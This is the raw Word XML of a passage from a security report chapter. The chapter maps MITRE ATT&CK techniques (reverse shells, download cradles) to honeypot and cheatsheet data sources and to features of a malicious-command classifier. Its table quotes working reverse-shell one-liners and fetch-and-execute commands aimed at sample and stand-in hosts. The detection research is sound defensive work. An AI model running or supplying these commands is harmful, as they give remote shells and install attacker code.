    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>traffic where the best model is near-chance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:br w:type="page"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 1 — Threat &amp; Telemetry Mapping (my 3 rows)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Three MITRE ATT&amp;CK sub-techniques observed in the dataset, mapped from shell telemetry to the source that captures them, to the engineered features (from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/features.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FEATURE_NAMES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) that encode them, to whether a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>provenance-labeled</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> classifier can detect them reliably. The three are chosen to span the detectability spectrum: one cleanly detectable, one detectable-but-confounded, one effectively undetectable by content. Detectability claims are grounded in the error forensics of [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/ch8_findings.md</w:t>
      </w:r>
      <w:r>
        <w:t>](ch8_findings.md) and the source descriptions in [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>docs/DATA_CARD.md</w:t>
      </w:r>
      <w:r>
        <w:t>](../docs/DATA_CARD.md).</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spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sub-technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>How it appears in shell telemetry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dataset source &amp; how it is captured</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Derived / Engineered Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Can a provenance-labeled classifier detect it reliably?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1059.004 — Command &amp; Scripting Interpreter: Unix Shell</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (reverse shells)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">An interactive shell wired to a remote socket. Near-unique tokens: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>bash -i &gt;&amp; /dev/tcp/10.0.0.5/4444 0&gt;&amp;1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>nc -e /bin/sh 1.2.3.4 4444</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>; `rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f\</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/bin/sh -i 2&gt;&amp;1\</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>nc &lt;ip&gt; &lt;port&gt; &gt;/tmp/f</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>exec 3&lt;&gt;/dev/tcp/…; /bin/bash &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3`.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>payloads</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (PayloadsAllTheThings reverse-shell cheatsheet, lifted verbatim from markdown code blocks), </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>quasarnix</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (synthetic reverse shells combinatorially generated from ~34 threat-intel templates), </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>slp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (pentest-resource corpus), and live </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>honeypot</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Cowrie </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cowrie.command.input</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> events of attacker-typed shells).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_dev_tcp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_shell_bin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_redirect_out</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_fetch_bin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_shell_flag_i</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_exec_flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>YES — reliably (the "easy" positives).</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> The signature tokens (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/dev/tcp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>nc -e</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>mkfifo /tmp/f</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">) are essentially absent from every benign corpus, and the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_dev_tcp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_redirect_out</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_shell_bin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> features fire hard. Forensics confirm it: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>`quasarnix` 0/58 and `payloads` 0/15 false negatives</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — both XGBoost-hybrid and the CNN catch every reverse shell. Caveat: reliability rides partly on the clean style of these sources; a heavily obfuscated variant (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>awk</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>perl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>socat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>) could still slip past.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1105 — Ingress Tool Transfer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (curl/wget download cradles)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Fetch-and-execute pipelines: `wget http://185.22.11.9/x.sh -O- \</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>curl http://evil.host/a \</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cd /tmp \</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cd /dev/shm; wget &lt;url&gt;; chmod +x x; ./x</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>tftp -g -r bins &lt;ip&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">. Tells: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>wget</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>curl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> hand-off, a hard-coded IP/URL, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>chmod +x</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/tmp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>·</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/dev/shm` staging.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Dominantly </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>honeypot</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Cowrie): the botnet dropper chain is the single most common attacker input captured, logged whole as one </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cowrie.command.input</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> line. Also present in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>payloads</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>hacktricks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> writeups.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_fetch_bin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_url</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_ipv4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_pipes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_staging_dir</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_pipe_to_shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="907"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PARTIALLY — detectable in-domain, but confounded.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> The fetch-then-shell pattern is distinctive (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_fetch_bin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_url</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_pipes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">), but </w:t>
            </w:r>
